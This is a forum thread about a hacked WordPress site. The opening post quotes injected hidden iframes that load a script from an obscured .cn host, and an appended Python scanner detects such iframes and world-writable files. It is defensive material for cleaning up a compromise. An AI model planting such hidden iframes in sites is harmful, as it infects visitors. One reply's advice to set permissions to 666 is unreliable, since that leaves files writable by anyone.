My WP Site Hacked? Need Advice!

by reapr
6 replies
I noticed my sales a few days ago and went and checked out my wordpress sites.

I got a function error from one of the php files and eliminated it because a few extra lines of white space were added. Then I noticed something else in my index php file ... at the very bottom.

When my main index page was loading you could see these urls as like a download. Here is the code I found.

<iframe src="http://xxx.cn/xx.cgi?xxx61" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://xxx.cn/xx.cgi?xxx62" width=1 height=1 style="visibility: hidden"></iframe>
Now when I checked out the links above it just gave me a white page.
Needless to say I was quite surprised.

I found it in my root directory and even in the index page of my wp-content and wp-admin

I have the site functioning all now but ... have no idea how to stop it.

This affects several sites.

Thanks for any help.
#advice #hacked #site
  • Mickm
    Change the permissions to 666, 644 or 755 (depending on what the file/folder is for)

    Change your username and password on the hosting account

    Remove the iframe from all of the infected pages and re-upload.

    I had something like this happen to me a while ago.
    • Karen Blundell
      also change your passwords to your WordPress admin as well.
      Make sure you upgrade to the latest version of WordPress

      download the latest version of Malwarebytes' Anti-Malware at Malwarebytes.org and run a scan. You may have a browser hijacker and somehow they got your passwords.

      How to know if your browser is hijacked:

      search Google for Malwarebytes or any other reputable Anti-virus program of which you know the correct URL
      If you are re-directed to another page other than the proper URL, you guessed it, you have a browser hijacker virus and you need to clean your infected computer. Unfortunately it won't just take one program to clean out these viruses.

      Check it out first and post here and I will give further instructions, if needed.
    • reapr
      Originally Posted by Mickm

      Change the permissions to 666, 644 or 755 (depending on what the file/folder is for)

      Change your username and password on the hosting account

      Remove the iframe from all of the infected pages and re-upload.

      I had something like this happen to me a while ago.
      Do I change the folder or the file ...
      The main page affected was index.php in the root!

      Is there any way to go to their host and have their sites taken down?
  • Abledragon
    A couple of other things you can do once your blog is cleaned up:

    1) Install the WP-Security-Scan plugin, run the scan and follow their suggestions
    2) Install and activate the Bad Behaviour plugin and run it alongside Akismet
    3) Either use .htaccess or, with support from your hosting provider if necessary, place password protection on your wp-admin folder. This means that logging into your admin screens will become a 2 stage process instead of one, but it'll slow those hackers down.

    Cheers,

    Martin.
    Signature
    WealthyDragon - Earning My Living Online
    • reapr
      Thanks all for the advice!

      I have to add I am stumped as to how this has happened. I have managed to get my money earners back up in order that is the highest earning sites getting top priority.

      This is theft and it is an interruption of revenue. It is no different than someone cutting power to a physical business and that brick and mortar store not being able to collect revenue on sales due to the interruption of a service.

      It is no different than arriving home from work and realizing that hey ... something is not right and then over several days you realize that the burglar has made off with several items in a stealth manner.

      My host has said there is not much I can do. They said that the fact they are wordpress sites update to the latest version. Well I just realized that two of the hacked sites are the latest version. All the sites affected are on 3 accounts with the host. So now I am wondering if it is a problem with the host and not so much with wordpress.
  • Abledragon
    Even though your version may be the latest, if an earlier version of WP was compromised (maybe because that one went a couple of releases without being updated) then your newest version will be compromised too.

    Once you've cleaned everything up follow the steps I outlined above.

    Finally, you can check with Google whether your compromised version got into their cache with this neat tool:

    Cachechecker - How to check if your site has been hacked

    If the spam links are there you can go into Google WebMaster's Tools and ask them to review your site (once you've cleaned it up!) and remove the 'potentially harmful' tag.

    And here are some more articles on security for Wordpress:

    http://www.wealthydragon.com/blog/20...rdpress-blogs/

    (See also the Related Articles)

    Cheers,

    Martin.
    Signature
    WealthyDragon - Earning My Living Online
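
The following is an added example, not code from any poster in this thread. It walks a site directory, reports every iframe whose attributes hide it (the pattern found at the bottom of index.php in the opening post), and lists files that any user on the server can write to; the file extensions scanned and the 0/1-pixel size test are assumptions.

```python
import os
import re
import stat
import sys

# Opening <iframe> tag (may span lines); attributes are checked separately.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Signs the frame is meant to be invisible: 0/1 pixel size or hiding CSS.
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?[01](?:px)?["']?(?=[\s>/])"""
    r"""|visibility\s*:\s*hidden|display\s*:\s*none""",
    re.IGNORECASE,
)
SCAN_EXT = (".php", ".html", ".htm", ".js", ".tpl")  # assumed file types

def hidden_iframes(text):
    """Return (line_number, src) for each iframe tag that looks hidden."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        if HIDDEN_RE.search(tag):
            src = SRC_RE.search(tag)
            lineno = text.count("\n", 0, m.start()) + 1
            hits.append((lineno, src.group(1) if src else ""))
    return hits

def scan_tree(root):
    """Walk root; return (hidden-iframe findings, world-writable files)."""
    injected, writable = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue  # symlink modes say nothing about the target
            rel = os.path.relpath(path, root)
            if os.stat(path).st_mode & stat.S_IWOTH:
                writable.append(rel)
            if name.lower().endswith(SCAN_EXT):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for lineno, src in hidden_iframes(fh.read()):
                        injected.append((rel, lineno, src))
    return sorted(injected), sorted(writable)

if __name__ == "__main__":
    found, loose = scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".")
    for rel, lineno, src in found:
        print(f"hidden iframe  {rel}:{lineno}  src={src}")
    for rel in loose:
        print(f"world-writable {rel}")
```

Run it against a copy of the site root, then again after cleaning, so that injected copies in wp-content and wp-admin are not missed.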
